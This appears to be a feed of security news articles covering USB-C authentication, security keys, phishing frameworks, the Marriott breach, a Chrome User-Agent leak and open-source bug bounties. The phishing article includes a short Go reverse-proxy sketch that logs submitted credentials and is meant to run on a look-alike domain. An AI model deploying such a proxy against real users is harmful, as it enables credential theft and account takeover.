“Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time,” the FireEye researchers said.

]]>
<![CDATA[Decipher Podcast: Stefan Tanase]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-stefan-tanase https://duo.com/decipher/decipher-podcast-stefan-tanase Thu, 10 Jan 2019 00:00:00 -0500

Dennis Fisher talks with Stefan Tanase, a principal security researcher at Ixia, about the concept of Internet Balkanization, the consequences of large-scale censorship for users, and how technical and policy experts can help address the problem.

]]>
<![CDATA[Bringing Security to USB Type-C, or More Limitations?]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/bringing-security-to-usb-type-c-or-more-limitations https://duo.com/decipher/bringing-security-to-usb-type-c-or-more-limitations Wed, 09 Jan 2019 00:00:00 -0500

As security programs go, the USB Type-C Authentication Program has a lofty goal: to create a cryptographic-based authentication scheme that would protect host systems from malicious USB chargers, cables, and devices.

USB Type-C is commonly found on notebooks, smartphones, and other connected devices because it allows faster data transfer and more power delivery than other USB interfaces. However, many enterprises disable the USB ports on corporate devices because adversaries are increasingly targeting USB devices and ports. A better approach would be to let enterprises whitelist permitted USB devices. Users want assurances that the charger or the public charging station they are using will not fry their devices. The USB Type-C Authentication Program, unveiled by the non-profit group USB Implementers Forum (USB-IF), would make it possible to check that a device (or cable) is what it claims to be at the moment it is plugged into the USB port.

The dangers of USB-based attacks range from malicious payloads on USB devices, which can load malware onto the host system—injecting keystrokes, installing backdoors, emulating mouse movements, logging events and data, and hijacking traffic—to counterfeit cables and chargers, which deliver too much (or too little) power and damage the system. Researchers have shown how plugging a device into a malicious power charging station could result in the device being infected with malware. Under this authentication program, OEMs and vendors will be able to certify that their USB Type-C products are protected against commonly used hardware attack methods and have not been modified.

Many operating systems used to open USB devices automatically, but that is no longer the default behavior because of the increased risks. As a result, many operating systems implicitly do not trust USB devices on first run, and require users to actively open the connection to the device. The USB Type-C Authentication Program will provide manufacturers and OEM vendors with a security framework based on the USB Type-C Authentication specification, originally unveiled in 2016 by the USB-IF and the USB 3.0 Promoter Group. The protocol supports authenticating over the USB data bus or USB power delivery communications channels and enforces 128-bit security for all cryptographic methods. The protocol will also let products retain control over their security policies.

The specification outlines how host devices would confirm the authenticity of whatever is plugged into the USB port immediately, before any data or power transfer is made. The system will either block or permit the transfer of data or power, depending on the result of the validation check. It's not only the host that can make the validation check—a charger can also authenticate a host, said Jeff Ravencraft, president and COO of USB-IF.

OEM vendors and manufacturers can create products that meet the specification so that the host system can use the protocol to perform the authentication checks. Certified devices will use 128-bit cryptographic-based authentication for certificate format, digital signing, hash and random number generation. Certificate authority DigiCert will provide and manage the public key infrastructure and the certificates used for the program. OEM and device manufacturers will contact DigiCert directly to set up their PKI operations and for certificate issuance, and DigiCert will provision a signed intermediate CA.
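The specification itself is the authority on message formats, but the underlying idea is ordinary public-key challenge and response. A minimal sketch in Python, with invented names and flow details (the real protocol also validates a certificate chain rooted at the USB-IF CA):

```python
# A hedged illustration of certificate-based device authentication; the
# message formats and APIs here are invented for clarity, not taken from
# the USB Type-C Authentication specification.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# The device (say, a charger) holds a private key whose public half is
# carried in a vendor certificate chained to the USB-IF root CA.
device_key = ec.generate_private_key(ec.SECP256R1())  # P-256, ~128-bit security

# 1. Before permitting data or power transfer, the host sends a random challenge.
challenge = os.urandom(32)

# 2. The device signs the challenge with its private key.
signature = device_key.sign(challenge, ec.ECDSA(hashes.SHA256()))

# 3. The host verifies the signature using the public key from the device's
#    certificate (chain validation omitted); failure raises InvalidSignature.
device_key.public_key().verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
print("device authenticated; policy decides whether to allow the transfer")
```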

"A company can issue certificates, via our certificate program with DigiCert, that can then be embedded in their products, giving their products a specific proof of identity and capabilities," said Ravencraft. "Companies' CA operations are rooted in the USB-IF CA."

At this point, the primary motivation for the program seems to be less about blocking attacks that use malicious hardware and more about addressing the problem of counterfeits. The approach will verify that a product was actually made by its stated manufacturer, but may not have measurable impact attesting to the security of a given device. Windows expert Alex Ionescu was concerned that including the authentication functionality at such a low level could potentially introduce more bugs and increase the attack surface.

"Primary purpose is to fight counterfeits and help identify malicious or uncertified products," Ravencraft said.

The program opens up a lot of potential use cases for enterprises, such as being able to set security policies that restrict USB functions based on certificate status. For example, enterprises can set a policy to allow phones to be charged only at public terminals that pass the validation check.

"[Enterprises] will be able to define a policy for dealing with products that have a certificate and those that don't," Ravencraft said.

However, for individual users, there is a risk that this program could become over-restrictive and impose a form of hardware DRM, making devices incompatible with other USB Type-C products in the market. The program is open-ended and leaves it up to individual vendors how to use the certification program. Vendors could use the program to restrict support to only approved (certified) devices, such that a cable from another brand no longer works. If a Samsung device needs its own Samsung cable, as opposed to one from LG or a generic cable purchased off Amazon, that would seriously impact usability. Existing cables are unlikely to be certified, so users may be forced to swap out cables at some point.

“The intention of the program seems good, but there is certainly room for abuse," Joe Fedewa wrote over at XDA-Developers. "USB-C has been a promise of one standard connector for all devices. We’d hate to see that ruined by devices that won’t allow users to use perfectly safe 3rd-party accessories.”

Hardware manufacturers haven't said they will use the program to lock consumers into only using "supported" accessories, but the potential is there. USB-IF consists of representatives from manufacturers including Apple, HP, Intel and Microsoft, so these companies likely are working on such products. The program, which is ready to issue certificates, is currently optional for OEMs, so there is time to see how the certification rules evolve.

Image credit: Photo by Stefan Steinbauer on Unsplash

]]>
<![CDATA[Yubico Adds NFC-Enabled and Lightning Security Keys]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/yubico-adds-nfc-enabled-and-lightning-security-key https://duo.com/decipher/yubico-adds-nfc-enabled-and-lightning-security-key Wed, 09 Jan 2019 00:00:00 -0500

The people holding off on enabling strong two-factor authentication on their various accounts are quickly running out of reasonable excuses. This week, that list got even shorter when Yubico launched an NFC-enabled hardware security key that works wirelessly, as well as a separate key with a Lightning port connector for Apple hardware.

The Security Key NFC is a modified version of the existing YubiKey, which has a single USB-A connector. The addition of the NFC (near field communication) capability allows people to use it with some Android mobile devices as well as some Windows laptops that have NFC readers attached. Like the other Yubico keys, the Security Key NFC supports both the FIDO2 and U2F (universal 2nd factor) protocols for 2FA.

“With the option of multiple communication methods, this one key is able to deliver a simple and seamless user experience across multiple devices for strong multi-factor, two-factor (2FA), and single-factor passwordless authentication,” Ronnie Manning of Yubico said in a post.

With many people using their mobile devices as their main computing and communications platforms now, NFC-based 2FA is becoming a vital feature for hardware security keys. The current generation of USB-based keys work well for laptops and desktops, but generally aren’t usable with mobile devices. Yubico last year announced an integration of its NEO keys with iOS, but that required some work on the part of app developers.

The new Security Key NFC isn’t the lone option for NFC-based 2FA. Google sells its own Titan security key bundle, which includes an NFC key and a separate USB key. Those keys are mainly meant for use with Google’s own services, such as Google Cloud and its Advanced Protection Program, but also can be used on third-party services. An open-source alternative also exists, the Solo Key, and the team behind that project plans to have an NFC-enabled key available in the coming months, as well.

The other new key Yubico introduced at the Consumer Electronics Show this week has both a USB-C and a Lightning connector, enabling people to use it with both iOS devices and MacBooks. Current MacBooks only have USB-C ports, so using a hardware security key requires an adapter. The YubiKey for Lightning eliminates that requirement, and also adds the ability to use it with iPhones and iPads.

Many popular services, including much of Google’s portfolio, Facebook, Twitter, some online banking apps, and others give users the ability to use U2F hardware keys for 2FA, and more sites are making the option available all the time. Hardware keys give users a strong defense against account-takeover and phishing attacks and are considered much more resilient to attack than SMS-based 2FA schemes.

]]>
<![CDATA[Phishing Frameworks and Toolkits Continue to Mature]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/phishing-frameworks-and-toolkits-continue-to-mature https://duo.com/decipher/phishing-frameworks-and-toolkits-continue-to-mature Tue, 08 Jan 2019 00:00:00 -0500

Though it’s an old technique, phishing is still a major problem for many organizations, including those with sophisticated security teams and security-aware users. APT groups and other high-level attackers often use highly credible, well-crafted phishing emails and sites to target victims, with notable success.

Two-factor authentication has become one of the major hurdles for groups using phishing to target valuable services. Understanding the tactics attackers use to try and bypass 2FA is important for both users and enterprise security teams, and this need has led to the rise of a wave of feature-rich phishing frameworks and tools for penetration testers.

Phishing toolkits have been around for many years, but many of them are custom tools developed internally by security consultancies, pen testing shops, and large enterprises with mature security teams. Many attack groups have their own versions, as well, optimized for their target industries and organizations. For various reasons, most of these tools don’t usually become public. So in recent years, security researchers and individual penetration testers have begun developing and releasing their own tools and frameworks to simulate phishing campaigns and help target users and organizations get a handle on the techniques and tricks attackers use in real campaigns.

One of the new entrants in this field is Modlishka, a reverse proxy designed to be a point-and-click tool for running phishing campaigns against any target domain. The tool allows a penetration tester to proxy traffic between a target user and the back-end server the user thinks she is communicating with. Modlishka allows an operator to intercept traffic from a user to a given site and gather credentials.

“All of the user’s traffic is handled of course over an encrypted browser trusted communication channel, where all of the relevant traffic is intercepted (such as credentials, authenticated session tokens, etc.) and the user is kept under the phishing domain, until a ’termination’ URL is triggered (it can be specified through the options),” Piotr Duszyński, the developer of Modlishka, said in an email to Decipher.

“In that moment the victim can be redirected to an arbitrary website and his access is restricted from accessing the phishing URL again. It is useful, for example, after the credentials have been collected. This tool is very flexible, in how the campaign should be carried out.”
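Conceptually, the core of a tool like Modlishka is a transparent reverse proxy sitting between the victim and the legitimate site. The short Go sketch below illustrates that general technique under simple assumptions; it is not Modlishka's actual code, and the target URL and logging are placeholders.

    package main

    import (
        "bytes"
        "io"
        "log"
        "net/http"
        "net/http/httputil"
        "net/url"
    )

    func main() {
        // The legitimate site the victim believes they are talking to.
        target, err := url.Parse("https://example.com")
        if err != nil {
            log.Fatal(err)
        }
        proxy := httputil.NewSingleHostReverseProxy(target)

        http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
            // Record anything that looks like a credential or token
            // submission, then restore the body so the request can be
            // forwarded upstream intact.
            if r.Method == http.MethodPost {
                body, _ := io.ReadAll(r.Body)
                log.Printf("captured: %s", body)
                r.Body = io.NopCloser(bytes.NewReader(body))
            }
            r.Host = target.Host
            proxy.ServeHTTP(w, r)
        })

        // An operator would serve this from a look-alike domain with a
        // valid TLS certificate for that domain, so the victim's browser
        // shows an encrypted, "trusted" connection throughout.
        log.Fatal(http.ListenAndServe(":8080", nil))
    }

Because every request and response flows through the proxy, anything the victim submits is visible to the operator in transit.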

"Currently the only resilient 2FA to this attack is based on U2F protocol."

Because the user’s traffic is proxied through Modlishka, the operator has the ability to intercept one-time codes and push notifications used in some 2FA schemes.

“All traffic, including cross domain HTTP/HTTPS calls are being proxied, which allows [you] to bypass all standard 2FA (TOTP, HOTP, Push based 2FA,etc.). Currently the only resilient 2FA to this attack is based on U2F protocol,” Duszyński said.

The Universal 2nd Factor standard relies on hardware security keys as the second factor in authentication operations, requiring the user to tap a key plugged into her computer. Some services, including Twitter, Facebook, and Google, offer users the ability to use U2F keys rather than SMS or other software-based 2FA mechanisms.
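That resilience comes from origin binding. During a U2F exchange, the browser includes the web origin it is actually connected to in the data the hardware key signs, so an assertion captured on a look-alike domain fails verification at the legitimate site. The simplified Go sketch below shows just that server-side origin check; a real implementation also verifies the signature, the challenge, and a usage counter.

    package main

    import (
        "encoding/json"
        "fmt"
    )

    // clientData is a simplified version of the client data the browser
    // reports during a U2F assertion; the hardware key's signature
    // covers this structure, so it can't be altered in transit.
    type clientData struct {
        Challenge string `json:"challenge"`
        Origin    string `json:"origin"`
    }

    // originOK rejects assertions generated at any other origin, such
    // as a phishing proxy's look-alike domain.
    func originOK(raw []byte, expected string) bool {
        var cd clientData
        if err := json.Unmarshal(raw, &cd); err != nil {
            return false
        }
        return cd.Origin == expected
    }

    func main() {
        phished := []byte(`{"challenge":"abc123","origin":"https://examp1e.com"}`)
        fmt.Println("accepted:", originOK(phished, "https://example.com")) // prints: accepted: false
    }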

There are a number of other tools in somewhat the same vein as Modlishka, including Evilginx2, a framework designed to phish session cookies and user credentials, and Judas, a standalone phishing proxy. There also are full-fledged phishing frameworks such as Gophish that allow operators to create templates and launch campaigns to see how aware users are of phishing techniques. Security consultants and penetration testers can be expensive, so open-source tools such as Gophish, Evilginx, and Modlishka can help organizations assess their level of awareness without laying out huge amounts of money.

“I created Gophish because I believe you shouldn't need a large security budget to measure your organization's exposure to phishing. My goal is to provide a high-quality phishing simulation framework that's quick to set up, easy to use, and has features that ‘just work’- all for free,” said Jordan Wright, the creator of Gophish and an R&D engineer at Duo Security.

]]>
<![CDATA[BlackBerry Turns Focus to IoT Security]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/blackberry-turns-focus-to-iot-security https://duo.com/decipher/blackberry-turns-focus-to-iot-security Mon, 07 Jan 2019 00:00:00 -0500

In its short time on this earth, the Internet of Things has managed to accumulate a large number of nicknames, none of which is very flattering. Most of those epithets have something to do with IoT devices not being so secure. BlackBerry, the erstwhile mobile device maker, is hoping to change that state of affairs with a set of new software offerings to help IoT manufacturers build more secure software and hardware.

The rush in recent years to make every device under the sun Internet-enabled has led to some unfortunate security outcomes for users and manufacturers. Many hardware makers that are producing IoT devices may not have mature internal software security processes, especially manufacturers that are mainly focused on building consumer-grade devices. Priority tends to be given to getting devices into the marketplace as quickly and inexpensively as possible. Hardening the software and hardware against attacks takes considerable time and money.

BlackBerry is offering a new set of services that’s meant to take much of the security burden off of manufacturers by supplying hardware and software security support during both the manufacturing and development processes. There are three separate offerings, including one that provides manufacturers with a system to establish a hardware Root of Trust for devices, connected to the BlackBerry network operations center.

“During manufacturing, a BlackBerry Secure Identity Service Key is injected into the hardware and recorded on a secure server. Both at launch and periodically throughout the product’s lifecycle, checks are performed to verify that the two keys match. If they do not, the device no longer boots,” BlackBerry said.
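BlackBerry hasn't published the mechanics of that check, but the pattern it describes is a standard challenge-response attestation against a hardware-bound key. The Go sketch below is a rough illustration of that general pattern only; the HMAC construction and function names are assumptions for illustration, not BlackBerry's implementation.

    package main

    import (
        "crypto/hmac"
        "crypto/rand"
        "crypto/sha256"
        "fmt"
    )

    // respond runs on the device: it proves possession of the key
    // injected at manufacture by answering a server challenge.
    func respond(deviceKey, challenge []byte) []byte {
        mac := hmac.New(sha256.New, deviceKey)
        mac.Write(challenge)
        return mac.Sum(nil)
    }

    // verify runs on the server: it recomputes the answer using the key
    // recorded at manufacture and compares in constant time. In the
    // scheme BlackBerry describes, a mismatch means the device no
    // longer boots.
    func verify(recordedKey, challenge, response []byte) bool {
        return hmac.Equal(respond(recordedKey, challenge), response)
    }

    func main() {
        key := []byte("key-injected-at-manufacture") // hypothetical secret
        challenge := make([]byte, 32)
        rand.Read(challenge)
        fmt.Println("device passes check:", verify(key, challenge, respond(key, challenge)))
    }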

“IoT device manufacturers can address security and privacy concerns head-on and stand out in the cluttered IoT space."

Another of the new services, the Secure Foundations Feature Pack, focuses on making the software in IoT devices more secure.

“In addition to hardening the operating system kernel, the Foundations Pack locks down software being executed with Secure Boot and ARM Trustzone technology to securely generate, use and store encryption keys used for various software operations. It also includes the BlackBerry Integrity Detection (BID) service which [monitors] various components (kernel, Pathtrust, SELinux, etc) across the software stack, and generates real-time ‘health’ reports that can be accessed by users and trusted third-party applications,” the company said.

The first few generations of IoT devices have mostly consisted of products that were retrofitted with connectivity and other functionality. Newer devices are being designed from the beginning to be connected, but that hasn’t necessarily translated into better security. Researchers and attackers have had little trouble finding weaknesses in many IoT devices, including home automation systems, smart city devices, and vehicle infotainment and operation systems. The lack of security in many connected devices has emerged as a serious concern in recent years, and, if history is any guide, the road to secure development and manufacturing practices will be a long one.

“IoT device manufacturers can address security and privacy concerns head-on and stand out in the cluttered IoT space by bringing to market ultra-secure products that consumers, retailers, and enterprises want to buy and use,” Alex Thurber, senior vice president and general manager of mobility solutions at BlackBerry, said.

]]>
<![CDATA[Marriott Breach Included 5 Million Passport Numbers]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/marriott-breach-included-5-million-stolen-passport-numbers https://duo.com/decipher/marriott-breach-included-5-million-stolen-passport-numbers Fri, 04 Jan 2019 00:00:00 -0500

When Marriott announced a huge data breach in November, the company estimated that about 500 million people were affected by the incident. After more than a month of investigation and forensics work, the company has lowered that number to about 383 million people, but also said that several million unencrypted passport numbers were taken during the breach.

The breach involved an intrusion into the Starwood reservations database dating back to 2014, but was only discovered in 2018. The attackers had access to a wide range of customer data, including names, home addresses, email addresses, and phone numbers. In some cases, they also had access to customers’ payment card information, birthdates, and passport numbers.

“Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database,” the Marriott statement from November says.

On Friday, Marriott officials said that the investigation into the compromise has revealed that more than five million plaintext passport numbers were accessed during the intrusion. Replacing a passport is much more time-consuming and involved than replacing a payment card compromised in a breach, and passport numbers are quite valuable as unique identifiers. Marriott officials said the company is in the process of setting up a resource to allow customers to check whether their passport number was part of the breach.

“Marriott now believes that approximately 5.25 million unencrypted passport numbers were included in the information accessed by an unauthorized third party. The information accessed also includes approximately 20.3 million encrypted passport numbers. There is no evidence that the unauthorized third party accessed the master encryption key needed to decrypt the encrypted passport numbers,” Marriott’s new statement says.

“Marriott has identified approximately 383 million records as the upper limit."

In its initial disclosure in November, Marriott said that although the payment card data stolen was encrypted, it was possible that the attackers had accessed the key material needed to decrypt them. However, in the updated disclosure, Marriott officials said there is “no evidence that the unauthorized third party accessed either of the components needed to decrypt the encrypted payment card numbers.” The company also said that of the 8.6 million encrypted payment card numbers that were stolen, all but 354,000 of them were expired by September 2018.

As is often the case with data breaches, Marriott also revised the number of total records involved in the incident. But unlike most breaches, the number dropped, from approximately 500 million to fewer than 400 million.

“Marriott has identified approximately 383 million records as the upper limit for the total number of guest records that were involved in the incident. This does not, however, mean that information about 383 million unique guests was involved, as in many instances, there appear to be multiple records for the same guest. The company has concluded with a fair degree of certainty that information for fewer than 383 million unique guests was involved, although the company is not able to quantify that lower number because of the nature of the data in the database,” the company said.

The attackers behind the breach were able to get into the Starwood hotel chain reservation database in 2014. This occurred before Marriott and Starwood merged, and Marriott officials said the company has now taken the Starwood database offline and all reservations now flow through the Marriott system.

]]>
<![CDATA[Google Patches Old Chrome Flaw on Android That Disclosed Device Info]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-patches-old-chrome-flaw-on-android-that-disclosed-device-info https://duo.com/decipher/google-patches-old-chrome-flaw-on-android-that-disclosed-device-info Thu, 03 Jan 2019 00:00:00 -0500

More than three years after researchers reported a weakness in Chrome for Android that allows an attacker to discover the patch level, firmware version, and hardware model of a device, Google has released a partial fix that hides the firmware build information but still leaves the device model exposed.

The issue stems from the way that the Chrome browser for Android sends information about the device and the software on it to web sites. Chrome, which is the default browser on Android devices, sends a specific set of information in the browser headers to any site a user visits. That information includes the User Agent string, which in turn includes the Android version number and build tag identifier. This is similar to the way that desktop browsers behave, sending information to sites to help them identify what type of browser and OS the user is running. The difference is the build number that Chrome on Android includes.

“The fact that it identifies the operating system and its version is not unique. This follows generally what many other browsers have been doing on desktop and mobile. It is the build tag that is the problem. As described above, the build tag identifies both the device name and its firmware build,” Yakov Shafranovich of Nightwatch Cybersecurity said in an advisory on the issue, published Dec. 25.

“For many devices, this can be used to identify not only the device itself, but also the carrier on which it is running and from that the country. It can also be used to determine which security patch level is on the device and which vulnerabilities the device is vulnerable to.”

For attackers, the build information and other data about the device can be quite valuable. That information can tell an attacker exactly what device model and patch level the user has, which the attacker can then use to decide how to attack that specific device. Many older Android devices have unpatched vulnerabilities that an attacker could target with the right information at hand.
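Extracting that information takes almost no effort, because it arrives in the User-Agent header of every request. The short Go sketch below pulls the model and build tag out of a representative pre-fix Chrome-on-Android User-Agent string; the sample string and regular expression are illustrative.

    package main

    import (
        "fmt"
        "regexp"
    )

    func main() {
        // A representative Chrome-on-Android User-Agent string from
        // before the fix, including device model and firmware build tag.
        ua := "Mozilla/5.0 (Linux; Android 7.0; SM-G930V Build/NRD90M) " +
            "AppleWebKit/537.36 (KHTML, like Gecko) " +
            "Chrome/59.0.3071.125 Mobile Safari/537.36"

        re := regexp.MustCompile(`Android ([\d.]+); (\S+) Build/(\S+)\)`)
        if m := re.FindStringSubmatch(ua); m != nil {
            // From the build tag, an attacker can often infer the
            // carrier, country, and security patch level of the device.
            fmt.Printf("OS %s, model %s, firmware build %s\n", m[1], m[2], m[3])
        }
    }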

Researchers at Nightwatch discovered the weakness and first reported it to Google in 2015. However, Google engineers said the issue was not a vulnerability and that it wouldn’t be fixed.

“This is [working as intended]. For webview, the client can override,” a Chromium engineer wrote in a response at the time of the initial bug report.

Three years later, a new bug was filed with Google and the company released a partial fix for the issue in Chrome 70 for Android in October. The update, which also applies to Chrome on iOS and the desktop, removes the firmware build information from the Chrome header, but the device’s model number is still there.

“All prior versions are believed to be affected. Users are encouraged to upgrade to version 70 or later. Since this fix doesn’t apply to WebView usage, app developers should manually override the User Agent configuration in their apps,” Shafranovich said.

One workaround for the issue is to go into the Chrome settings on Android and use the Desktop Site option.

]]>
<![CDATA[Deciphering Office Space]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/deciphering-office-space https://duo.com/decipher/deciphering-office-space Wed, 02 Jan 2019 00:00:00 -0500

For anyone who has worked a thankless job for a tyrannical, ineffectual boss, Office Space touches a nerve. The story of a trio of programmers--Peter Gibbons, Michael Bolton, and Samir Nagheenanajar--at the faceless Initech in the late 1990s, Office Space mixes the existential dread of dead-end jobs with the illicit thrill of deciding to get back at your boss and everyone else. In this case, the revenge comes in the form of a virus that steals money from Initech and transfers it to Peter and his pals. Office Space is perhaps the quintessential tech industry comedy and set the stage for Silicon Valley nearly 20 years later. This is Deciphering Office Space.

]]>
<![CDATA[Open Source Software Needs Funding, Not Bug Bounty Programs]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/open-source-software-needs-funding-not-bug-bounty-programs https://duo.com/decipher/open-source-software-needs-funding-not-bug-bounty-programs Wed, 02 Jan 2019 00:00:00 -0500

While the European Union’s latest bug bounty program for widely used open source projects sounds like a step towards improving the security of the overall Internet ecosystem, these programs may wind up complicating efforts to secure these applications.

The European Union has committed to pay €850,000 (nearly $1 million) in bug bounties for vulnerabilities found in 15 open source projects as part of the latest edition of the Free and Open Source Software Audit (FOSSA) project, said Julia Reda, a member of the European Parliament representing the German Pirate Party. The projects are 7-zip, Apache Kafka, Apache Tomcat, Digital Signature Services (DSS), Drupal, Filezilla, FLUX TL, the GNU C Library (glibc), KeePass, midPoint, Notepad++, PuTTY, the Symfony PHP framework, VLC Media Player, and WSO2. Six of the projects will accept vulnerability reports until the summer, six until the end of the year, and three will accept reports through 2020. Drupal, a powerful content management system, and PuTTY, a terminal emulator, serial console and network file transfer application, have the largest amounts allocated under this program, at €89,000 ($101,000) and €90,000 ($102,000), respectively.

FOSSA was launched by Reda and Max Andersson, a member of Sweden’s Green Party in the European Parliament, after researchers discovered the Heartbleed vulnerability in OpenSSL back in 2014. Heartbleed affected not just SSL/TLS connections but also the many applications that relied on the open source library, leaving many organizations scrambling to understand their exposure. The initial version of FOSSA created an inventory of all open source software used by the European Parliament and sponsored security audits of the Apache HTTP web server and the KeePass password manager. The second edition of FOSSA ran a bug bounty program on HackerOne for VLC Media Player.

However, the EU announcement highlights one of the main problems with bug bounties: the emphasis is on finding vulnerabilities, not fixing them. Developers already have a long list of vulnerabilities and bugs—bug hunters just make the list longer. Developers need the resources to be able to fix the issues. The way issues get fixed in open source software is also very different from closed-source and proprietary software, which also adds to the pressure on the project maintainer.

Only those who are responsible for fixing bugs should start bug bounties. (Katie Moussouris, Luta Security)

“The projects are already overworked, they don’t need a bunch of new bugs to fix,” Josh Bressers, who leads product security at Elastic, the company behind Elastic Stack (Elasticsearch, Kibana, Beats, and Logstash), wrote on Open Source Security.

Creating a Longer List

Bug bounty programs let organizations learn about flaws in their applications that they otherwise would not know about, but that knowledge doesn’t help if the organizations don’t have a way to triage the incoming reports and fix the issues. Enterprises can decide to invest in developing that process. That isn’t always an option for open source projects—if they don’t have corporate sponsors—as they tend to be underfunded and rely heavily on volunteers. The projects that would benefit most from having more people scrutinizing the codebase for flaws are the same projects that are hurt because they can’t readily shift resources to fix those issues.

“I disagree that it's [bug bounty program] a good thing on its own. Where is the money for more paid maintainers?” Katie Moussouris, founder of Luta Security and expert in software vulnerability management, wrote on Twitter. “Oops. It's not there.”

Consider the case of Network Time Protocol (NTP), an open source protocol used to synchronize clocks on servers and devices to make sure they all have the same time. It is arguably one of the most important pieces of software in use, but back in 2016, the lack of financial support meant there were grave concerns over maintaining the software long-term. There was too much for principal engineer Harlan Stenn, as the sole maintainer, to do alone, but without a sponsor or more funding, hiring someone to help wasn’t an option. NTP currently gets funding from the Linux Foundation’s Core Infrastructure Initiative, and the Network Time Foundation, a non-profit Stenn established for NTP, lists several corporate donors on the site.

But imagine if there had been a bug bounty program for NTP around the time the project team was trying to figure out its financial future. A bounty would have made sense—NTP is critical Internet infrastructure in every way that matters—but without additional funding for maintainers, any flaws it surfaced would have remained unfixed.

“A #bugbounty on open source projects that don’t get any funding for additional maintainers is likely to decimate the volunteer maintainer labor pipeline of the future,” Moussouris wrote.

One possibility is to require the finder to submit a working patch along with the vulnerability report, but Moussouris said that creates additional challenges for the maintainers. When the maintainers for Apache Server Core, who are named in this program, were asked if getting patches would be helpful, they "specifically said no emphatically, since they already spend an inordinate amount of time arguing against patches that would introduce breaking changes," Moussouris said. "Tying bounty payout to this would increase their work."

Deployment Challenges

Bug bounty programs operate on the assumption that resources exist to resolve the issues that are found. That assumption plays out differently for open source software and commercial software. When an issue is found in commercial software and responsibly disclosed, the vendor typically has a set window of time to fix it, during which there is no public information about the flaw. With open source software, the vulnerability may be saved to a public tracking system such as Bugzilla or GitHub Issues, where developers discuss the best approach to fixing the flaw in the open.

If there is a delay in fixing the issues—because there is only one person and only so many hours in a day—users are left vulnerable because anyone could use the public details and create exploits targeting those flaws.

Where is the money for more paid maintainers? Oops. It's not there.

“Any security issue disclosed in public leaves users vulnerable until a fix is found,” said Tim Mackey, senior technical evangelist at Black Duck by Synopsys.

Even if the developers fix the issue promptly, there remains the challenge of delivering the fix to all the users. Commercial software typically has a single release stream, so once the issue is addressed in that stream, all users get the fix when they apply the update. In open source software, there are multiple release versions and branches, making it difficult to coordinate fixes in a way that ensures all the branches pick up the updated code.

“This [delivering the fix] is by far the most significant hurdle for bug bounty-based efforts in [open source software],” Mackey said.

Funding For Fixers

"Only those who are responsible for fixing bugs should start bug bounties," Moussouris said. "Else, you risk bug foie gras."

Bug bounty programs should be considered as part of a broader software management program, one that looks at how software is developed, maintained, and supported. The recent focus on bug bounty programs for open source projects doesn’t automatically lead to more secure software. These projects are chronically underfunded.

Tying bounty payout to this would increase their work.

“I would be happier had they also funded developers and security professionals to work with the communities creating their target applications,” Mackey said. That way, issues would be discovered and software could be improved at the same time.

There needs to be a framework that lets groups—governments, companies, and individuals—fund open source projects in a more sustainable manner.

Figuring out the “next step that will give the projects resources” will go further towards improving security than bug bounty programs, Bressers wrote. “Resources aren’t always money, sometimes it’s help, sometimes it’s gear, sometimes it’s pizza.”

This story was updated with additional comments posted on Twitter by Katie Moussouris.

]]>
<![CDATA[Government Shutdown Impacts Enterprise Security]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/government-shutdown-impacts-enterprise-security https://duo.com/decipher/government-shutdown-impacts-enterprise-security Mon, 31 Dec 2018 00:00:00 -0500

Editor's Note: This story has been updated.

While the federal government shutdown has had an immediate effect on the hundreds of thousands of employees and contractors either furloughed or forced to work without pay, IT security teams outside of the government could also be affected as necessary public services become unavailable.

The partial shutdown began when funding for parts of the government ran out on Dec. 22, impacting more than a third of the federal employees working at departments including State, Justice, Treasury, Transportation, Interior, Agriculture, and Homeland Security. Nearly half of the affected 800,000 workers are working without pay—such as air traffic controllers and agents at airport security checkpoints—while the rest are furloughed. Who works and who stays home depends on which jobs are considered “essential.” That means many of the federal security workforce are exempt from the shutdown, especially those specialists responsible for security operations, monitoring networks, and defending systems against attacks.

While the Justice Department’s Justice Security Center is staying open and the Treasury Department identified computer security incident response and emergency operations staff as essential, nearly 85 percent of the National Institute of Standards and Technology staff are furloughed. With so much of NIST closed, release dates could slip for the security standards and guidelines the agency has been working on, including the new risk management framework, changes to the federal government’s guidelines on security controls, and requirements for handling controlled unclassified information.

Though NIST’s standards are written for federal agencies, corporate security teams use them as a baseline for their own security programs. The NIST guidelines provide enterprises with actionable security best practices as well as detailed threat-mitigation strategies, so a delay in releasing these publications will affect security teams at organizations waiting for them.

Also closed: the FIPS validation programs, the Cryptographic Algorithm Validation Program (CAVP) and the Cryptographic Module Validation Program (CMVP), which means products can't undergo testing during this period. CMVP certifies that products used by the federal government to collect, store, transfer, share and disseminate "sensitive, but not classified" information meet the requirements of FIPS 140-2. CAVP validation is the prerequisite for CMVP testing.

Trying to keep networks and data safe and thwarting attacks when not at full-strength is risky, especially when no one can predict how long this state of affairs will last.

“At a minimum, agencies must avoid any threat to the security, confidentiality and integrity of the agency information and information systems maintained by or on behalf of the government," the Office of Management and Budget said in a memo released on Jan. 19, 2018. “Agencies should maintain appropriate cybersecurity functions across all agency information technology systems, including patch management and security operations center (SOC) and incident response capabilities.”

Services Stay Open

Even though much of NIST’s work will be interrupted with the shutdown, several NIST services will stay open. During the shutdown period, a computer scientist and an IT specialist will maintain the National Vulnerability Database, 16 employees will manage NIST’s time servers, and an IT specialist will be at the National Cybersecurity Center of Excellence.

